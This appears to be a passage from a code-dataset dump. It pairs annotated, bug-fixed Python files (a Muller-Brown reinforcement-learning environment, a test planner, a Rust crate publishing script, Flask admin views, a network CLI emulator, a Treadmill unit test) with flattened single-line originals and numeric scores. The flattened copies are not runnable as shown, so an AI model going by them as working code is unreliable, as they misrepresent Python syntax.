        # callers (step/reset) are responsible for validity
        self.agent_position = state

    def is_off_grid(self, state):
        # True when *state* lies on or outside the domain boundary
        x,y = state
        if (x >= self.x_max) or (x <= self.x_min):
            return True
        elif (y >= self.y_max) or (y <= self.y_min):
            return True
        else:
            return False

    def step(self, action):
        # reward = energy drop; moving downhill on the PES is rewarded
        old_energy = self.energy(self.agent_position)
        new_state = self.agent_position + 0.2*action
        done = False # we don't have a pre-set endpoint
        if not self.is_off_grid(new_state):
            self.set_state(new_state)
            new_energy = self.energy(new_state)
            reward = old_energy - new_energy
            return new_state, reward, done, {}
        else:
            reward = -1e2 # penalize off-grid moves
            return self.agent_position, reward, done, {}

    def reset(self):
        # restart the agent at a uniformly random in-bounds position
        new_position = self.observation_space.sample()
        self.set_state(new_position)
        return self.agent_position


if __name__ == '__main__':
    # smoke test: take 10 random actions and animate the trajectory
    env = MullerBrownContinuousEnv()
    for _ in range(10):
        obs,reward,_,_ = env.step(env.action_space.sample())
        print(obs,reward)
        env.render()
        plt.pause(0.01)
        plt.close()
gym_muller_brown/envs/muller_brown_continuous.py
import gym import numpy as np import matplotlib.pyplot as plt from itertools import product from gym import error, spaces, utils from gym.utils import seeding class MullerBrownContinuousEnv(gym.Env): metadata = {'render.modes': ['human']} def __init__(self): # state space self.x_min = -1.5 self.x_max = 1.0 self.y_min = -0.5 self.y_max = 2.0 self.observation_space = spaces.Box(low=np.array([self.x_min,self.y_min]), high=np.array([self.x_max,self.y_max]), dtype=float) # action space self.action_min = -1 self.action_max = 1 self.action_space = spaces.Box(low=self.action_min, high=self.action_max,shape=(2,),dtype=float) # precompute some energies for plotting PES self.grid_points = 60 self.energies = np.empty((self.grid_points,self.grid_points)) x = np.linspace(self.x_min,self.x_max,self.grid_points) y = np.linspace(self.y_min,self.y_max,self.grid_points) for ix,iy in product(range(self.grid_points),range(self.grid_points)): self.energies[ix,iy] = self.energy((x[ix],y[iy])) self.reset() def plotPES(self): ''' Renders the continuous Muller Brown PES (environment) ''' x = np.linspace(self.x_min,self.x_max,self.grid_points) y = np.linspace(self.y_min,self.y_max,self.grid_points) fig,ax = plt.subplots() im = plt.pcolormesh(x,y,self.energies.T, cmap='GnBu_r', vmax=10,shading='nearest') ax.set_aspect('equal') cbar = fig.colorbar(im, ax=ax) plt.xlabel('x') plt.ylabel('y') cbar.set_label('energy') return fig def render(self, mode='human'): self.plotPES() x,y = self.agent_position plt.plot(x,y,marker='o',color='#C91A09',markersize=8) def energy(self, state): ''' Muller-Brown potential energy surface Parameters: state : integer pair (ix,iy) from state energy : float ''' x,y = state A = [-200, -100, -170, 15] a = [-1, -1, -6.5, 0.7] b = [0, 0, 11, 0.6] c = [-10, -10, -6.5, 0.7] x0 = [1, 0, -0.5, -1] y0 = [0, 0.5, 1.5, 1] energy = 0.0 for k in range(len(x0)): energy += (A[k]) *\ np.exp(a[k]*(x-x0[k])**2 +\ b[k]*(x-x0[k])*(y-y0[k]) +\ c[k]*(y-y0[k])**2) return energy def 
set_state(self, state): self.agent_position = state def is_off_grid(self, state): x,y = state if (x >= self.x_max) or (x <= self.x_min): return True elif (y >= self.y_max) or (y <= self.y_min): return True else: return False def step(self, action): old_energy = self.energy(self.agent_position) new_state = self.agent_position + 0.2*action done = False # we don't have a pre-set endpoint if not self.is_off_grid(new_state): self.set_state(new_state) new_energy = self.energy(new_state) reward = old_energy - new_energy return new_state, reward, done, {} else: reward = -1e2 # penalize off-grid moves return self.agent_position, reward, done, {} def reset(self): new_position = self.observation_space.sample() self.set_state(new_position) return self.agent_position if __name__ == '__main__': env = MullerBrownContinuousEnv() for _ in range(10): obs,reward,_,_ = env.step(env.action_space.sample()) print(obs,reward) env.render() plt.pause(0.01) plt.close()
0.685739
0.386706
from . import testcases
from testing.testcases import tc_path_plan_a_star as testcase
from logger.logger import logger
import time


class test_planner(object):
    '''
    Discovers registered testcases and executes their preconditions,
    teststeps and postconditions in sorted order, logging progress and
    collecting a per-testcase result record.
    '''

    def __init__(self):
        '''
        Constructor
        '''
        self.list_tc = {}        # testcase name -> testcase class
        self.list_tc_init = {}   # testcase name -> instantiated testcase object
        self.logger = logger("test_planner")
        self.results = []        # one {"name", "duration", "result"} dict per run

    def get_available_testcases(self):
        """
        append all testcases to the tc_list and instantiate each one
        """
        self.list_tc = testcases.get_available_tc()
        for key in self.list_tc.keys():
            self.list_tc_init[key] = self.list_tc[key]()

    def run(self):
        """
        runs all the registered testcases and returns self.results
        """
        for tc_key in self.list_tc.keys():
            self.logger.write_log("-------------------------------------------------")
            self.logger.write_log("running testcase: " + tc_key)
            starttime = time.time()
            tc_obj = self.list_tc_init[tc_key]
            tc_class = self.list_tc[tc_key]
            preCon_keys = []
            testStep_keys = []
            postCon_keys = []
            # classify the testcase's methods by naming convention
            # (substring match: "precondition", "teststep", "postcondition")
            for m_key in tc_class.__dict__.keys():
                if m_key.find("precondition") != -1:
                    preCon_keys.append(m_key)
                elif m_key.find("teststep") != -1:
                    testStep_keys.append(m_key)
                elif m_key.find("postcondition") != -1:
                    # BUG FIX: postconditions were appended to testStep_keys,
                    # so they ran as teststeps and the postcondition phase
                    # below always iterated an empty list
                    postCon_keys.append(m_key)
            # sort so the phases execute in a deterministic order
            preCon_keys.sort()
            testStep_keys.sort()
            postCon_keys.sort()
            self.logger.write_log("-------------------------------------------------")
            self.logger.write_log("running precondition: " + tc_key)
            for preCon in preCon_keys:
                self.logger.write_log("running precondition: " + preCon + "\n")
                tc_class.__dict__[preCon](tc_obj)
            self.logger.write_log("-------------------------------------------------")
            self.logger.write_log("running teststeps: " + tc_key)
            for teststep in testStep_keys:
                self.logger.write_log("running teststep: " + teststep + "\n")
                tc_class.__dict__[teststep](tc_obj)
            self.logger.write_log("-------------------------------------------------")
            self.logger.write_log("running postcondition: " + tc_key)
            for postCon in postCon_keys:
                self.logger.write_log("running postcondition: " + postCon + "\n")
                tc_class.__dict__[postCon](tc_obj)
            duration = time.time() - starttime
            self.logger.write_log("-------------------------------------------------")
            self.logger.write_log("finished testcase: " + tc_key + " in " + str(duration)[:6])
            # TODO(review): "result" is hard-coded False; capture a real
            # pass/fail verdict from the testcase instead
            self.results.append({"name": tc_key, "duration": duration, "result": False})
        return self.results
src/testing/test_planner.py
from . import testcases from testing.testcases import tc_path_plan_a_star as testcase from logger.logger import logger import time class test_planner(object): ''' classdocs ''' def __init__(self): ''' Constructor ''' self.list_tc = {} self.list_tc_init={} self.logger = logger("test_planner") self.results = [] def get_available_testcases(self): """ append all testcases to the tc_list """ self.list_tc = testcases.get_available_tc() for key in self.list_tc.keys(): self.list_tc_init[key] = self.list_tc[key]() def run(self): """ runs all the registered testcases """ for tc_key in self.list_tc.keys(): self.logger.write_log("-------------------------------------------------") self.logger.write_log("running testcase: " + tc_key) starttime = time.time() tc_obj = self.list_tc_init[tc_key] tc_class = self.list_tc[tc_key] preCon_keys = [] testStep_keys = [] postCon_keys = [] for m_key in tc_class.__dict__.keys(): if m_key.find("precondition") != -1: preCon_keys.append(m_key) elif m_key.find("teststep") != -1: testStep_keys.append(m_key) elif m_key.find("postcondition") != -1: testStep_keys.append(m_key) # sort the teststeps preCon_keys.sort() testStep_keys.sort() postCon_keys.sort() self.logger.write_log("-------------------------------------------------") self.logger.write_log("running precondition: " + tc_key) for preCon in preCon_keys: self.logger.write_log("running precondition: " + preCon + "\n") tc_class.__dict__[preCon](tc_obj) self.logger.write_log("-------------------------------------------------") self.logger.write_log("running teststeps: " + tc_key) for teststep in testStep_keys: self.logger.write_log("running teststep: " + teststep + "\n") tc_class.__dict__[teststep](tc_obj) self.logger.write_log("-------------------------------------------------") self.logger.write_log("running postcondition: " + tc_key) for postCon in postCon_keys: self.logger.write_log("running postcondition: " + postCon + "\n") tc_class.__dict__[postCon](tc_obj) duration = 
time.time()-starttime self.logger.write_log("-------------------------------------------------") self.logger.write_log("finished testcase: " + tc_key +" in " +str(duration)[:6]) self.results.append({"name":tc_key, "duration":duration,"result":False}) return self.results
0.18159
0.102709
import subprocess
import argparse
import sys
import os
import shutil
import time

import friendlytoml as toml

# publisher configuration lives next to this script
config = toml.load(os.path.join(os.path.dirname(__file__), "publish_rust.toml"))

HOME = os.environ["HOME"]
PROJECT_FOLDER = os.path.join(HOME, os.path.join(*config["dir"]["rust"]))
USER = config["user"]
GITHUB_DOMAIN = USER + ".github.io"
GITHUB_FOLDER = os.path.join(HOME, os.path.join(*config["dir"]["github"]), GITHUB_DOMAIN)


def publish(PROJECT, UPDATE=False):
    """Attempts to publish the rust project at the given path.

    PROJECT is the folder name of the project under PROJECT_FOLDER.
    When UPDATE is True, every prompt is auto-confirmed and generated
    files (travis config, license, cargo metadata) are overwritten.

    Builds, tests and documents the crate, generates missing project
    files, copies docs into the github.io repo and updates Cargo.toml.
    Errors are reported by printing and returning None.
    """
    path = os.path.join(PROJECT_FOLDER, PROJECT)
    if not os.path.exists(path):
        # print(...) returns None — report and bail out in one statement
        return print("Could not find project directory: '{}'".format(path))
    if UPDATE:
        print("> Force Update: ON")
    if not os.path.exists(GITHUB_FOLDER):
        # BUG FIX: GITHUB_FOLDER was passed as a second positional argument
        # to print() instead of being formatted into the message
        print("Github repo not found, creating at '{}'...".format(GITHUB_FOLDER))
        os.makedirs(GITHUB_FOLDER)

    def prompt(msg):
        """Helper function for simple prompts; always True when UPDATE is on."""
        confirmations = {"y", "yes", "yup", "yea", "sure", "indeed"}
        if UPDATE:
            return True
        else:
            print("> ", end="")
            res = input(msg + " (y/n)\n>>> ").lower()
            return res in confirmations

    # ---- derive project metadata from Cargo.toml and config ----
    CARGO_PATH = os.path.join(path, "Cargo.toml")
    cargo = toml.load(CARGO_PATH)
    package = cargo["package"]
    CRATE = package["name"]
    AUTHORS = package["authors"]
    AUTHOR_STRING = AUTHORS[0] if len(AUTHORS) == 1 else ", ".join(AUTHORS)
    REPOSITORY = "https://github.com/" + USER + "/" + PROJECT
    DOCUMENTATION = "https://" + GITHUB_DOMAIN + "/" + PROJECT + "/" + CRATE
    LICENSE_FILE = config["license"]["file"]
    LICENSE_PATH = os.path.join(path, LICENSE_FILE)
    LICENSE_SHORT = config["license"]["short"]
    README_FILE = config["readme"]["file"]
    README_PATH = os.path.join(path, README_FILE)
    TRAVIS_FILE = config["travis"]["file"]
    TRAVIS_PATH = os.path.join(path, TRAVIS_FILE)
    TRAVIS_URL = "https://travis-ci.org/" + USER + "/" + PROJECT

    os.chdir(path)
    print("> Preparing publishment")

    # ---- build / test / doc; abort on the first cargo failure ----
    print("> Building...")
    res = subprocess.call(["cargo", "build"])
    if res:
        return print("> Error while building")
    print("> Testing...")
    res = subprocess.call(["cargo", "test"])
    if res:
        return print("> Error while testing")
    print("> Compiling documentation...")
    res = subprocess.call(["cargo", "doc"])
    if res:
        return print("> Error while compiling documentation")

    # Travis CI
    if not os.path.exists(TRAVIS_PATH) or UPDATE:
        print("> Adding '{}'...".format(TRAVIS_FILE))
        travis_template = config["travis"]["template"]
        with open(TRAVIS_PATH, "w") as f:
            f.write(travis_template)

    # License
    if (not os.path.exists(LICENSE_PATH)) or UPDATE:
        print("> Adding '{}' license at '{}'...".format(LICENSE_SHORT, LICENSE_PATH))
        license_map = {
            "author": AUTHOR_STRING,
            "year": time.localtime().tm_year
        }
        # renamed from `license` to avoid shadowing the builtin
        license_text = config["license"]["long"].format_map(license_map)
        with open(LICENSE_PATH, "w") as f:
            f.write(license_text)

    # github.io Documentation
    source = os.path.join(path, "target", "doc")
    destination = os.path.join(GITHUB_FOLDER, PROJECT)
    if os.path.exists(destination) and prompt("Update documentation?"):
        print("> Cleaning destination folder...")
        shutil.rmtree(destination)
    if not os.path.exists(destination):
        print("> Moving new documentation files...")
        shutil.copytree(source, destination)

    # Readme
    if not os.path.exists(README_PATH) or prompt("Overwrite existing README?"):
        print("> Writing README at '{}'...".format(README_PATH))
        readme_map = {
            "project": PROJECT,
            "license_short": LICENSE_SHORT,
            "documentation_url": DOCUMENTATION,
            "repository": REPOSITORY,
            "crate": CRATE,
            "travis_url": TRAVIS_URL
        }
        readme = config["readme"]["template"].format_map(readme_map)
        with open(README_PATH, "w") as f:
            f.write(readme)

    # Crates.io cargo metadata: fill in missing keys (or all, when UPDATE)
    cargo_updated = []

    def find_or_set(key, default):
        # records in cargo_updated whether any key was (re)written
        if (key not in package) or UPDATE:
            package[key] = default
            cargo_updated.append(True)

    find_or_set("readme", README_FILE)
    find_or_set("documentation", DOCUMENTATION)
    find_or_set("license", LICENSE_SHORT)
    if cargo_updated:
        print("> Updating cargo metadata...")
        with open(CARGO_PATH, "w") as f:
            toml.dump(cargo, f)

    print("> Done! Added to '{}'".format(destination))


def main(args=sys.argv[1:]):
    """Entry point"""
    parser = argparse.ArgumentParser()
    parser.add_argument("project",
        help="The name of the folder of the rust project to publish")
    parser.add_argument("-f", "--force_update", action="store_true", default=False,
        help="Forces everything to be updated/overwritten by default")
    parsed = parser.parse_args()
    publish(parsed.project, UPDATE=parsed.force_update)


if __name__ == '__main__':
    main()
publish_rust.py
import subprocess import argparse import sys import os import shutil import time import friendlytoml as toml config = toml.load(os.path.join(os.path.dirname(__file__), "publish_rust.toml")) HOME = os.environ["HOME"] PROJECT_FOLDER = os.path.join(HOME, os.path.join(*config["dir"]["rust"])) USER = config["user"] GITHUB_DOMAIN = USER + ".github.io" GITHUB_FOLDER = os.path.join(HOME, os.path.join(*config["dir"]["github"]), GITHUB_DOMAIN) def publish(PROJECT, UPDATE=False): """Attempts to publish the rust project at the given path""" path = os.path.join(PROJECT_FOLDER, PROJECT) if not os.path.exists(path): return print("Could not find project directory: '{}'".format(path)) if UPDATE: print("> Force Update: ON") if not os.path.exists(GITHUB_FOLDER): print("Github repo not found, creating at '{}'...", GITHUB_FOLDER) os.makedirs(GITHUB_FOLDER) def prompt(msg): """Helper function for simple prompts""" confirmations = {"y", "yes", "yup", "yea", "sure", "indeed"} if UPDATE: return True else: print("> ", end="") res = input(msg+" (y/n)\n>>> ").lower() return res in confirmations CARGO_PATH = os.path.join(path, "Cargo.toml") cargo = toml.load(CARGO_PATH) package = cargo["package"] CRATE = package["name"] AUTHORS = package["authors"] AUTHOR_STRING = AUTHORS[0] if len(AUTHORS) == 1 else ", ".join(AUTHORS) REPOSITORY = "https://github.com/" + USER + "/" + PROJECT DOCUMENTATION = "https://" + GITHUB_DOMAIN + "/" + PROJECT + "/" + CRATE LICENSE_FILE = config["license"]["file"] LICENSE_PATH = os.path.join(path, LICENSE_FILE) LICENSE_SHORT = config["license"]["short"] README_FILE = config["readme"]["file"] README_PATH = os.path.join(path, README_FILE) TRAVIS_FILE = config["travis"]["file"] TRAVIS_PATH = os.path.join(path, TRAVIS_FILE) TRAVIS_URL = "https://travis-ci.org/" + USER + "/" + PROJECT os.chdir(path) print("> Preparing publishment") print("> Building...") res = subprocess.call(["cargo", "build"]) if res: return print("> Error while building") print("> Testing...") res = 
subprocess.call(["cargo", "test"]) if res: return print("> Error while testing") print("> Compiling documentation...") res = subprocess.call(["cargo", "doc"]) if res: return print("> Error while compiling documentation") # Travis CI if not os.path.exists(TRAVIS_PATH) or UPDATE: print("> Adding '{}'...".format(TRAVIS_FILE)) travis_template = config["travis"]["template"] with open(TRAVIS_PATH, "w") as f: f.write(travis_template) # License if (not os.path.exists(LICENSE_PATH)) or UPDATE: print("> Adding '{}' license at '{}'...".format(LICENSE_SHORT, LICENSE_PATH)) license_map = { "author": AUTHOR_STRING, "year": time.localtime().tm_year } license = config["license"]["long"].format_map( license_map) with open(LICENSE_PATH, "w") as f: f.write(license) # github.io Documentation source = os.path.join(path, "target", "doc") destination = os.path.join(GITHUB_FOLDER, PROJECT) if os.path.exists(destination) and prompt("Update documentation?"): print("> Cleaning destination folder...") shutil.rmtree(destination) if not os.path.exists(destination): print("> Moving new documentation files...") shutil.copytree(source, destination) # Readme if not os.path.exists(README_PATH) or prompt("Overwrite existing README?"): print("> Writing README at '{}'...".format(README_PATH)) readme_map = { "project": PROJECT, "license_short": LICENSE_SHORT, "documentation_url": DOCUMENTATION, "repository": REPOSITORY, "crate": CRATE, "travis_url": TRAVIS_URL } readme = config["readme"]["template"].format_map(readme_map) with open(README_PATH, "w") as f: f.write(readme) # Crates.io cargo metadata cargo_updated = [] def find_or_set(key, default): if (not key in package) or UPDATE: package[key] = default cargo_updated.append(True) find_or_set("readme", README_FILE) find_or_set("documentation", DOCUMENTATION) find_or_set("license", LICENSE_SHORT) if cargo_updated: print("> Updating cargo metadata...") with open(CARGO_PATH, "w") as f: toml.dump(cargo, f) print("> Done! 
Added to '{}'".format(destination)) def main(args=sys.argv[1:]): """Entry point""" parser = argparse.ArgumentParser() parser.add_argument("project", help="The name of the folder of the rust project to publish") parser.add_argument("-f", "--force_update", action="store_true", default=False, help="Forces everything to be updated/overwritten by default") parsed = parser.parse_args() publish(parsed.project, UPDATE=parsed.force_update) if __name__ == '__main__': main()
0.275032
0.091139
from flask import Blueprint, flash, jsonify, request, redirect, render_template, session, url_for from flask_login import login_required, current_user from ims.common.ComboBoxUtil import getComCategoryList from ims.common.Messages import Messages from ims.common.RoleUtil import admin_required from ims.contents.comCont import MasterDataList as listCont from ims.contents.comCont import MasterDetails as detailsCont from ims.form.masterDataForm import MasterDataForm from ims.service.comServ import insertUpdateMasterData as insertUpdateDto from ims.service.comServ import getComItemList as getDtoList from ims.service.comServ import getComItem as getDto from ims.service.comServ import deleteMasterData as deleteDto masterData = Blueprint('masterData', __name__) @masterData.route('/list/') @admin_required def master_list(): """マスタデータ一覧の初期表示 GETのrequestを受付 当処理はhtmlテンプレート及び画面用コンテンツを返します。 """ categoryList = getDtoList('master_combo') comboList = getComCategoryList(categoryList) cont = listCont(comboList) return render_template('master_data_management/master-list.html', cont=cont) @masterData.route('/list/getData/', methods = ['POST']) @admin_required def master_post_data(): """マスタデータ一覧表示用データ取得 POSTのrequestを受付 一覧画面から選択されたカテゴリーのデータを取得し、json形式でデータを返します。 :param category: 選択されたカテゴリー """ try: category = request.json['category'] models = getDtoList(category) dataset = [] for model in models: data = {} data["itemId"] = model.item_id data["itemCd"] = model.item_cd data["itemValue"] = model.item_value data["displayOrder"] = model.display_order data["isActive"] = model.is_active dataset.append(data) except: pass return jsonify(dataset) @masterData.route('/create/') @admin_required def master_create(): """マスタデータ作成処理 一覧画面から「新規作成」を押下後、GETのrequestを受付します。 htmlテンプレート及び画面用コンテンツを返します。 """ categoryList = getDtoList('master_combo') comboList = getComCategoryList(categoryList) form = MasterDataForm() form.itemCategory.choices = [(i.key, i.value) for i in comboList] cont = detailsCont(form) return 
render_template('master_data_management/master-details.html', cont=cont) @masterData.route('/<int:itemId>/edit/') @admin_required def master_edit(itemId): """マスタデータ修正処理 一覧画面からデータの「コード」を押下後、GETのrequestを受付します。 htmlテンプレート及び画面用コンテンツを返します。 :param itemId: 対象データのID """ dto = getDto(itemId) if not dto: flash(Messages.WARNING_NOT_FOUND_ALREADY_UPDATED_DELETED, Messages.WARNING_CSS) return redirect(url_for('masterData.master_list')) categoryList = getDtoList('master_combo') form = MasterDataForm() form.itemCategory.choices = [(i.item_cd, i.item_value) for i in categoryList] form.itemId.data = dto.item_id form.itemCategory.data = dto.item_category form.itemCD.data = dto.item_cd form.itemValue.data = dto.item_value form.displayOrder.data = dto.display_order form.isActive.data = dto.is_active cont = detailsCont(form) return render_template('master_data_management/master-details.html', cont=cont) @masterData.route('/details/save/', methods=['POST']) @admin_required def master_save(): """マスタデータ詳細画面登録処理 formのデータをDBに保存します。 処理終了後はマスタデータ一覧画面へ遷移します。 """ categoryList = getDtoList('master_combo') comboList = getComCategoryList(categoryList) form = MasterDataForm() form.itemCategory.choices = [(i.key, i.value) for i in comboList] if form.validate_on_submit(): if form.itemId.data: isUpdate = True dto = getDto(form.itemId.data) if dto: pass else: flash(Messages.WARNING_NOT_FOUND_ALREADY_UPDATED_DELETED, Messages.WARNING_CSS) return redirect(url_for('masterData.master_list')) else: isUpdate = False data = form.data data['updateUser'] = current_user.user_id data['isActive'] = bool(form.isActive.data) try: insertUpdateDto(data, isUpdate) except Exception: return redirect(url_for('masterData.master_list')) if isUpdate: flash(Messages.SUCCESS_UPDATED, Messages.SUCCESS_CSS) else: flash(Messages.SUCCESS_INSERTED, Messages.SUCCESS_CSS) return redirect(url_for('masterData.master_list')) for error in form.errors.values(): flash(error[0],Messages.DANGER_CSS) cont = detailsCont(form) return 
render_template('master_data_management/master-details.html', cont=cont) @masterData.route('/details/<int:itemId>/delete/') @admin_required def master_delete(itemId): """マスタデータ詳細画面削除処理 当該データを物理削除します。 処理終了後はマスタデータ一覧画面へ遷移します。 :param itemId: 削除対象のIDです。 """ dto = getDto(itemId) if dto: pass else: flash(Messages.WARNING_NOT_FOUND_ALREADY_UPDATED_DELETED, Messages.WARNING_CSS) return redirect(url_for('masterData.master_list')) deleteDto(itemId) flash(Messages.SUCCESS_DELETED, Messages.SUCCESS_CSS) return redirect(url_for('masterData.master_list'))
ims/views/masterData.py
from flask import Blueprint, flash, jsonify, request, redirect, render_template, session, url_for from flask_login import login_required, current_user from ims.common.ComboBoxUtil import getComCategoryList from ims.common.Messages import Messages from ims.common.RoleUtil import admin_required from ims.contents.comCont import MasterDataList as listCont from ims.contents.comCont import MasterDetails as detailsCont from ims.form.masterDataForm import MasterDataForm from ims.service.comServ import insertUpdateMasterData as insertUpdateDto from ims.service.comServ import getComItemList as getDtoList from ims.service.comServ import getComItem as getDto from ims.service.comServ import deleteMasterData as deleteDto masterData = Blueprint('masterData', __name__) @masterData.route('/list/') @admin_required def master_list(): """マスタデータ一覧の初期表示 GETのrequestを受付 当処理はhtmlテンプレート及び画面用コンテンツを返します。 """ categoryList = getDtoList('master_combo') comboList = getComCategoryList(categoryList) cont = listCont(comboList) return render_template('master_data_management/master-list.html', cont=cont) @masterData.route('/list/getData/', methods = ['POST']) @admin_required def master_post_data(): """マスタデータ一覧表示用データ取得 POSTのrequestを受付 一覧画面から選択されたカテゴリーのデータを取得し、json形式でデータを返します。 :param category: 選択されたカテゴリー """ try: category = request.json['category'] models = getDtoList(category) dataset = [] for model in models: data = {} data["itemId"] = model.item_id data["itemCd"] = model.item_cd data["itemValue"] = model.item_value data["displayOrder"] = model.display_order data["isActive"] = model.is_active dataset.append(data) except: pass return jsonify(dataset) @masterData.route('/create/') @admin_required def master_create(): """マスタデータ作成処理 一覧画面から「新規作成」を押下後、GETのrequestを受付します。 htmlテンプレート及び画面用コンテンツを返します。 """ categoryList = getDtoList('master_combo') comboList = getComCategoryList(categoryList) form = MasterDataForm() form.itemCategory.choices = [(i.key, i.value) for i in comboList] cont = detailsCont(form) return 
render_template('master_data_management/master-details.html', cont=cont) @masterData.route('/<int:itemId>/edit/') @admin_required def master_edit(itemId): """マスタデータ修正処理 一覧画面からデータの「コード」を押下後、GETのrequestを受付します。 htmlテンプレート及び画面用コンテンツを返します。 :param itemId: 対象データのID """ dto = getDto(itemId) if not dto: flash(Messages.WARNING_NOT_FOUND_ALREADY_UPDATED_DELETED, Messages.WARNING_CSS) return redirect(url_for('masterData.master_list')) categoryList = getDtoList('master_combo') form = MasterDataForm() form.itemCategory.choices = [(i.item_cd, i.item_value) for i in categoryList] form.itemId.data = dto.item_id form.itemCategory.data = dto.item_category form.itemCD.data = dto.item_cd form.itemValue.data = dto.item_value form.displayOrder.data = dto.display_order form.isActive.data = dto.is_active cont = detailsCont(form) return render_template('master_data_management/master-details.html', cont=cont) @masterData.route('/details/save/', methods=['POST']) @admin_required def master_save(): """マスタデータ詳細画面登録処理 formのデータをDBに保存します。 処理終了後はマスタデータ一覧画面へ遷移します。 """ categoryList = getDtoList('master_combo') comboList = getComCategoryList(categoryList) form = MasterDataForm() form.itemCategory.choices = [(i.key, i.value) for i in comboList] if form.validate_on_submit(): if form.itemId.data: isUpdate = True dto = getDto(form.itemId.data) if dto: pass else: flash(Messages.WARNING_NOT_FOUND_ALREADY_UPDATED_DELETED, Messages.WARNING_CSS) return redirect(url_for('masterData.master_list')) else: isUpdate = False data = form.data data['updateUser'] = current_user.user_id data['isActive'] = bool(form.isActive.data) try: insertUpdateDto(data, isUpdate) except Exception: return redirect(url_for('masterData.master_list')) if isUpdate: flash(Messages.SUCCESS_UPDATED, Messages.SUCCESS_CSS) else: flash(Messages.SUCCESS_INSERTED, Messages.SUCCESS_CSS) return redirect(url_for('masterData.master_list')) for error in form.errors.values(): flash(error[0],Messages.DANGER_CSS) cont = detailsCont(form) return 
render_template('master_data_management/master-details.html', cont=cont) @masterData.route('/details/<int:itemId>/delete/') @admin_required def master_delete(itemId): """マスタデータ詳細画面削除処理 当該データを物理削除します。 処理終了後はマスタデータ一覧画面へ遷移します。 :param itemId: 削除対象のIDです。 """ dto = getDto(itemId) if dto: pass else: flash(Messages.WARNING_NOT_FOUND_ALREADY_UPDATED_DELETED, Messages.WARNING_CSS) return redirect(url_for('masterData.master_list')) deleteDto(itemId) flash(Messages.SUCCESS_DELETED, Messages.SUCCESS_CSS) return redirect(url_for('masterData.master_list'))
0.380759
0.21211
# Python modules from __future__ import absolute_import import socket # Third-party modules import tornado.gen import tornado.iostream from tornado.concurrent import TracebackFuture # NOC modules from .base import CLI from .telnet import TelnetIOStream class BeefCLI(CLI): name = "beef_cli" default_port = 23 def create_iostream(self): self.state = "notconnected" sender, receiver = socket.socketpair() self.sender = tornado.iostream.IOStream(sender) return BeefIOStream(receiver, self) @tornado.gen.coroutine def send(self, cmd): # @todo: Apply encoding cmd = str(cmd) self.logger.debug("Send: %r", cmd) if self.state != "prompt": raise tornado.gen.Return() # Will be replied via reply_state beef = self.script.request_beef() gen = beef.iter_cli_reply(cmd[: -len(self.profile.command_submit)]) self.ioloop.add_callback(self.streamer, gen) @tornado.gen.coroutine def streamer(self, gen): """ Stream gen to sender :param gen: :return: """ try: for reply in gen: yield self.sender.write(reply) yield except KeyError: # Propagate exception self.sender.write(self.SYNTAX_ERROR_CODE) yield def set_state(self, state): changed = self.state != state super(BeefCLI, self).set_state(state) # Force state enter reply if changed: self.ioloop.add_callback(self.reply_state, state) @tornado.gen.coroutine def reply_state(self, state): """ Spool state entry sequence :param state: :return: """ self.logger.debug("Replying '%s' state", state) beef = self.script.request_beef() for reply in beef.iter_fsm_state_reply(state): self.sender.write(reply) yield def close(self): self.sender.close() self.sender = None super(BeefCLI, self).close() def send_pager_reply(self, data, match): """ Beef need no pagers """ self.collected_data += [data] class BeefIOStream(TelnetIOStream): def connect(self, *args, **kwargs): """ Always connected :param args: :param kwargs: :return: """ future = self._connect_future = TracebackFuture() # Force beef downloading beef = self.cli.script.request_beef() if not beef: # Connection 
refused self.close(exc_info=True) return future future.set_result(True) # Start replying start state self.cli.set_state("start") self._add_io_state(self.io_loop.WRITE) return future def close(self): self.socket.close() self.socket = None
core/script/cli/beef.py
# Python modules from __future__ import absolute_import import socket # Third-party modules import tornado.gen import tornado.iostream from tornado.concurrent import TracebackFuture # NOC modules from .base import CLI from .telnet import TelnetIOStream class BeefCLI(CLI): name = "beef_cli" default_port = 23 def create_iostream(self): self.state = "notconnected" sender, receiver = socket.socketpair() self.sender = tornado.iostream.IOStream(sender) return BeefIOStream(receiver, self) @tornado.gen.coroutine def send(self, cmd): # @todo: Apply encoding cmd = str(cmd) self.logger.debug("Send: %r", cmd) if self.state != "prompt": raise tornado.gen.Return() # Will be replied via reply_state beef = self.script.request_beef() gen = beef.iter_cli_reply(cmd[: -len(self.profile.command_submit)]) self.ioloop.add_callback(self.streamer, gen) @tornado.gen.coroutine def streamer(self, gen): """ Stream gen to sender :param gen: :return: """ try: for reply in gen: yield self.sender.write(reply) yield except KeyError: # Propagate exception self.sender.write(self.SYNTAX_ERROR_CODE) yield def set_state(self, state): changed = self.state != state super(BeefCLI, self).set_state(state) # Force state enter reply if changed: self.ioloop.add_callback(self.reply_state, state) @tornado.gen.coroutine def reply_state(self, state): """ Spool state entry sequence :param state: :return: """ self.logger.debug("Replying '%s' state", state) beef = self.script.request_beef() for reply in beef.iter_fsm_state_reply(state): self.sender.write(reply) yield def close(self): self.sender.close() self.sender = None super(BeefCLI, self).close() def send_pager_reply(self, data, match): """ Beef need no pagers """ self.collected_data += [data] class BeefIOStream(TelnetIOStream): def connect(self, *args, **kwargs): """ Always connected :param args: :param kwargs: :return: """ future = self._connect_future = TracebackFuture() # Force beef downloading beef = self.cli.script.request_beef() if not beef: # Connection 
refused self.close(exc_info=True) return future future.set_result(True) # Start replying start state self.cli.set_state("start") self._add_io_state(self.io_loop.WRITE) return future def close(self): self.socket.close() self.socket = None
0.614625
0.087097
from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import unittest import click import click.testing import mock import treadmill from treadmill import plugin_manager from treadmill.admin import exc as admin_exceptions class AdminLdapAllocationTest(unittest.TestCase): """Mock test for treadmill.cli.admin.ldap.allocation""" def setUp(self): """Setup common test variables""" self.runner = click.testing.CliRunner() self.alloc_mod = plugin_manager.load( 'treadmill.cli.admin.ldap', 'allocation' ) self.alloc_cli = self.alloc_mod.init() @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.side_effect': admin_exceptions.NoSuchObjectResult, 'create.return_value': None }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_tenant_create(self): """Test creating a tenant. """ tenant_admin = treadmill.context.AdminContext.tenant.return_value res = self.runner.invoke( self.alloc_cli, [ 'configure', 'test', '-s', '123', ] ) self.assertEqual(res.exit_code, 0) tenant_admin.get.assert_called_once_with('test') tenant_admin.create.assert_called_once_with( 'test', {'systems': ['123']} ) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 